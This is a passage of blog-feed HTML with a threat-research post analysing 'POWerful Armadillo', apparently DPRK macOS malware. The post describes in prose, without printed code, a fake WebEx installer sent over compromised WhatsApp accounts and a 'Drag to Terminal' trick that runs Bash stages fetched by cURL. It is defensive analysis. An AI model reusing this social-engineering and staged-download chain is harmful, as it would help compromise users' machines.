src="https://substackcdn.com/image/fetch/$s_!1Hvs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png" width="324" height="486" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/de7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:1024,&quot;resizeWidth&quot;:324,&quot;bytes&quot;:2338864,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1Hvs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!1Hvs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!1Hvs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!1Hvs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fde7035c7-c818-4915-ba57-16a263b2a50a_1024x1536.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">When your vibecode is so good that you get invited to a Meet-and-Greet with the Great Leader himself!</figcaption></figure></div><p></p>]]></content:encoded></item><item><title><![CDATA[North Korea's Safari: Poaching for Armadillos]]></title><description><![CDATA[How we discovered POWerful Armadillo]]></description><link>https://quetzal.bitso.com/p/north-koreas-safari-poaching-for</link><guid isPermaLink="false">https://quetzal.bitso.com/p/north-koreas-safari-poaching-for</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Fri, 20 Feb 2026 16:05:00 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!DYau!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43360b67-a06f-47b5-8a71-f6527d8c4753_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Poaching is bad,</strong> let&#8217;s start by stating that. But you know what&#8217;s worse? Developing malware for a dictatorship.</p><p>Of all the fates in the grand scheme of things, you drew the worst one possible: a modern slave trapped in a never-ending loop of defrauding ordinary people, companies, and even yourself. Because at the end of the day, I doubt your inner child ever yearned to become some wacko&#8217;s <em>personal vibe coder</em>.</p><p>On top of that, a <a href="https://quetzal.bitso.com">group of weirdos</a> hunts you like day hunts night. And once again, dawn has caught you outside your burrow.</p><p>This is the story of how we discovered (and named) <strong><a href="https://otx.alienvault.com/pulse/699784922444c1eb0196e2fc">POWerful Armadillo</a></strong>, a new DPRK malware.</p><p>Thanks to our loyal sponsor,<a href="https://www.crowdstrike.com/en-us/adversaries/famous-chollima/"> </a><strong><a href="https://www.crowdstrike.com/en-us/adversaries/famous-chollima/">Famous Chollima</a></strong>, for sharing their samples with us.</p><div><hr></div><h2>Armadillos &amp; Quetzals</h2><p>We&#8217;re used to seeing these muppets try <a href="https://quetzal.bitso.com/p/interview-with-the-chollima-v">every trick in the book</a>, and write <a href="https://quetzal.bitso.com/p/final-chapter-interview-with-the">most of the new ones that end up in it</a>. They may not be the most technically sophisticated actors out there, but they are <strong>definitely creative</strong>, and this campaign was no exception.</p><p>For this operation, they shifted to using <strong>compromised WhatsApp accounts</strong> to distribute a fake <strong>WebEx</strong> installer in <strong><a href="https://en.wikipedia.org/wiki/Apple_Disk_Image">DMG</a></strong> format for <strong>macOS</strong>. Once executed, you&#8217;re presented with the typical application window, but labelled &#8220;<em>Drag to Terminal to Install.xyz</em>&#8221;. Of course, doing so executes the &#8220;installer&#8221; in your Terminal, <strong>with your privileges and the same access level as your user</strong>.</p><p>But we&#8217;re not doing that, you mischievous pony head. You know what time it is?</p><p><strong>Time for disassembling. Your malware, your campaign, and your dreams.</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!QrJA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!QrJA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!QrJA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!QrJA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!QrJA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!QrJA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png" width="512" height="512" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:512,&quot;bytes&quot;:566655,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!QrJA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!QrJA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!QrJA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!QrJA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e5ac571-a201-4a20-99dc-428854a964ba_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Welcome to Season 2! Here&#8217;s your contract!</figcaption></figure></div><p>The <em>.xyz</em> installer is actually a <strong>Bash script</strong> that downloads the malware loader via <strong>cURL</strong>. It is interestingly disguised as a publicly accessible <strong><a href="https://en.wikipedia.org/wiki/ASP.NET">ASPX</a></strong> file, but in reality it is just another <strong>Bash script</strong>.</p><p>For the sake of simplicity, we&#8217;ll shorten the component names to four letters plus extension, as the original names are excessively long.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mP9o!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mP9o!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png 424w, https://substackcdn.com/image/fetch/$s_!mP9o!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png 848w, https://substackcdn.com/image/fetch/$s_!mP9o!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png 1272w, https://substackcdn.com/image/fetch/$s_!mP9o!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mP9o!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png" width="1456" height="847" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/533e8ee9-098d-42d3-9265-1d74283f8f72_2230x1298.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:847,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:593159,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F533e8ee9-098d-42d3-9265-1d74283f8f72_2230x1298.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mP9o!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png 424w, https://substackcdn.com/image/fetch/$s_!mP9o!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png 848w, https://substackcdn.com/image/fetch/$s_!mP9o!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png 1272w, https://substackcdn.com/image/fetch/$s_!mP9o!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F490f9efc-817c-47cd-be97-a66641ae23ac_2230x1298.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The first component, <strong>PNZF</strong>, downloads three additional stages: <strong>4NWS</strong>, <strong>2KVS</strong> and <strong>01HY</strong>. The first and the last are piped into <strong>Bash</strong>, while the second is piped into <strong><a href="https://en.wikipedia.org/wiki/AppleScript">osascript</a></strong>, indicating that it is in fact <strong><a href="https://en.wikipedia.org/wiki/JavaScript">JavaScript</a></strong> code. </p><p>Let&#8217;s reconstruct the <strong>infection chain</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!jxg-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!jxg-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png 424w, https://substackcdn.com/image/fetch/$s_!jxg-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png 848w, https://substackcdn.com/image/fetch/$s_!jxg-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png 1272w, https://substackcdn.com/image/fetch/$s_!jxg-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!jxg-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png" width="1456" height="587" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7cc50a85-a284-4dc7-9a84-13dd66d07c89_2526x1018.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:587,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:521571,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7cc50a85-a284-4dc7-9a84-13dd66d07c89_2526x1018.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!jxg-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png 424w, https://substackcdn.com/image/fetch/$s_!jxg-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png 848w, https://substackcdn.com/image/fetch/$s_!jxg-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png 1272w, https://substackcdn.com/image/fetch/$s_!jxg-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb8c06d2c-c228-4a2f-9406-3133b180abc4_2526x1018.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The second stage downloads three additional components, all written in <strong>JavaScript</strong>: <strong>T65A</strong>, <strong>DQEZ</strong> and <strong>0CRW</strong>. Opening them, we find a rather predictable surprise: <strong>they&#8217;re obfuscated</strong>. But we know exactly which deobfuscator to use.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6T5K!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6T5K!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png 424w, https://substackcdn.com/image/fetch/$s_!6T5K!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png 848w, https://substackcdn.com/image/fetch/$s_!6T5K!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png 1272w, https://substackcdn.com/image/fetch/$s_!6T5K!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6T5K!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png" width="1456" height="1012" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/126fa331-5239-464e-9dfa-7d84034f6e03_2992x2080.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1012,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1610272,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/188606888?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F126fa331-5239-464e-9dfa-7d84034f6e03_2992x2080.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6T5K!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png 424w, https://substackcdn.com/image/fetch/$s_!6T5K!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png 848w, https://substackcdn.com/image/fetch/$s_!6T5K!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png 1272w, https://substackcdn.com/image/fetch/$s_!6T5K!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab9b1c71-2dfd-42d9-b262-d23821b1be06_2992x2080.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Does that ring a bell? It&#8217;s the <strong>exact</strong> same one they always use, and the same one we documented in our reports on <strong>BeaverTail</strong> and <strong>OtterCookie</strong>. Old habits die hard.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CoIh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9a768764-0ade-4435-8edd-2fc5e29dd0ef_2386x1550.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 